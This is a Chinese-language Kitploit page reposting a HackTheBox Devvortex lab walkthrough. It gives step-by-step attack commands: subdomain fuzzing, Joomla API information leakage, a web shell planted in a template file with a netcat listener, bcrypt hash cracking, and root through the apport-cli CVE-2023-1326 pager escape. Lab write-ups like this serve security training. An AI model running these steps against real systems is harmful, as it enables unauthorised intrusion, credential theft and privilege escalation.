Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
DEVVORTEX — HackTheBox Devvortex 演练,涵盖子域模糊测试、Joomla API 枚举、基于模板的 Web Shell、bcrypt 哈希破解以及 Apport-CLI CVE-2023-1326 权限提升。 | Kitploit
工具/GitHubGitHub/r3fr4kt/devvortex
密码破解权限提升漏洞分析Web应用程序漏洞利用信息收集CTF渗透测试子域名枚举学习与教育实验室与实践
GitHubr3fr4kt/devvortex

DEVVORTEX

7小时58分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

HackTheBox Devvortex 演练,涵盖子域模糊测试、Joomla API 枚举、基于模板的 Web Shell、bcrypt 哈希破解以及 Apport-CLI CVE-2023-1326 权限提升。

查看仓库

DEVVORTEX

HackTheBox: Devvortex — 机器渗透测试报告

一份全面的技术演练,详细描述了攻破 HackTheBox 上 Devvortex 机器的过程。此路径演示了 子域名模糊测试、Joomla API 枚举、用于初始访问的 模板修改、用于横向移动的 数据库哈希提取与破解,以及利用 Apport-CLI (CVE-2023-1326) 提权至 root。


执行摘要

  • 目标操作系统: Linux
  • 难度: 简单
  • 域名: devvortex.htb
  • 子域名: dev.devvortex.htb
  • 关键概念: 子域名枚举、Joomla CMS 利用、信息泄露、Bcrypt 哈希破解、Sudo 滥用 (apport-cli)。

1. 侦察与枚举

端口扫描 (Nmap)

首先对所有端口进行了快速的 TCP 端口发现:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

随后针对已识别的开放端口执行了服务与版本检测扫描:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Hosts 文件配置

将目标基础域名添加到本地主机名解析表中:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

子域名发现 (FFUF)

对虚拟主机进行模糊测试以识别额外的 Web 资产:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

结果: 发现了 dev.devvortex.htb。已将 dev.devvortex.htb 添加到 /etc/hosts。

目录模糊测试

对新发现的虚拟主机进行路由枚举:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

结果: 发现了 /administrator 端点,暴露了一个 Joomla 管理员认证门户。

2. 初始访问 (立足点)

通过 Joomla API 的信息泄露

探测 Joomla REST API 暴露的公共端点,以收集敏感的应用程序指标和用户信息:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

通过站点模板注入 Web Shell

使用枚举过程中发现的凭据,登录 Joomla /administrator 门户:

  1. 导航至 System > Site Templates。

  2. 选择活动模板并打开 error.php。

  3. 将 error.php 的内容替换为标准的 PHP 反向 shell 载荷。

在本地初始化 netcat 监听器:

Bash

root@kitploit:~
nc -lvnp 4444

通过请求一个不存在的页面或直接访问该文件来触发 error.php 的执行。

TTY Shell 稳定化

当 shell 以 www-data 身份连接后,生成一个交互式 PTY 会话:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. 横向移动 (Logan)

数据库枚举

使用从 Web 配置文件中获取的凭据访问本地 MySQL 数据库:

Bash

root@kitploit:~
mysql -u lewis -p

查询用户表以定位存储的凭据哈希:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

离线密码破解

将用户 logan 的 bcrypt 密码哈希提取到本地文件:

Bash

root@kitploit:~
nano hash.txt

使用 John the Ripper 配合 rockyou.txt 破解哈希:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

通过 SSH 认证

使用破解的凭据以用户 logan 身份建立持久 SSH 会话:

Bash

root@kitploit:~
ssh [email protected]

用户 Flag

Bash

root@kitploit:~
cat user.txt

4. 权限提升

Sudo 权限审计

检查 logan 用户被允许执行的二进制文件:

Bash

root@kitploit:~
sudo -l

输出: 用户可能以 root 身份运行 /usr/bin/apport-cli。

Apport-CLI 利用 (CVE-2023-1326)

检查已安装的 apport-cli 版本:

Bash

root@kitploit:~
apport-cli --version

检查 /var/crash 中是否存在报告文件。如果为空,则手动构造一个崩溃文件:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

使用 sudo 针对构造的崩溃文件启动 apport-cli:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. 按 v 键 查看报告。

  2. 当分页器 (less) 加载内容时,输入以下命令逃逸到系统 shell:

Plaintext

root@kitploit:~
!/bin/bash

5. 系统巩固

验证 root 提权:

Bash

root@kitploit:~
whoami
# Output: root

Root Flag

Bash

root@kitploit:~
cat /root/root.txt
下载工具